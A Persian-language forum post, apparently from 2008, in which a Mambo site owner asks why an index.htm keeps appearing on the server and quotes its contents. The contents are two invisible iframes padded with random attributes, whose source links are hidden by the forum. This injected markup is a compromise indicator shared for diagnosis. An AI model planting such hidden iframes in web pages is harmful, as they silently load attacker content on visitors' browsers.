-
یه مشکل عجیب (ساخته شدن فایل index.htm به صورت خود به خودی در
با سلام خدمت دوستان من حدود 12 روزه که مامبو رو نصب کردم و سایتم رو از نظر محتوایی دارم کامل می کنم ولی یه مشکل عجیب دیدم:
چند روز پیش وقتی تو آدرس بار IE ادرس سایتم رو وارد کردم یه صفحه کاملا سفید می یومد.رفتم فایل های Public_html رو چک کردم دیدم یه فایل index.htm به صورت خود به خود اونجا ظاهر شده! به هر حال گفتم شاید تصادفی باشه و پاکش کردم.
امروز دوباره دیدم ظاهر شده و یه نگاهی بهش انداختم و این کدها رو تو این فایل دیدم:
<iframe kuopx='NkltjIS2' mlxtr='BMW0tm8l' lpwso='QSkUr6GX' kmhph='qYGEyXXW' dbcok='R1GO4ypK' src='[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] ' wdhpk='g3ys6f9U' gsdsb='jaUufndy' bwomc='I4szeBBt' vreko='Pra6OhvJ' xmdno='N9jTO4Rq' width='205' height='349' style='display:none'></iframe>
<iframe kuopx='NkltjIS2' mlxtr='BMW0tm8l' lpwso='QSkUr6GX' kmhph='qYGEyXXW' dbcok='R1GO4ypK' src='[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] ' wdhpk='g3ys6f9U' gsdsb='jaUufndy' bwomc='I4szeBBt' vreko='Pra6OhvJ' xmdno='N9jTO4Rq' width='205' height='349' style='display:none'></iframe>
اگه دقت کنید اینو میبینید: '[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] من نمی دونم دقیقا چه اتفاقی داره میوفته .اساتید محترم و دوستان راهنمایی کنند؟
جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.
-
-
06-10-2008 07:02 PM
# ADS
تبلیغات در جوملا فارسی
علاقه مندی ها (Bookmarks)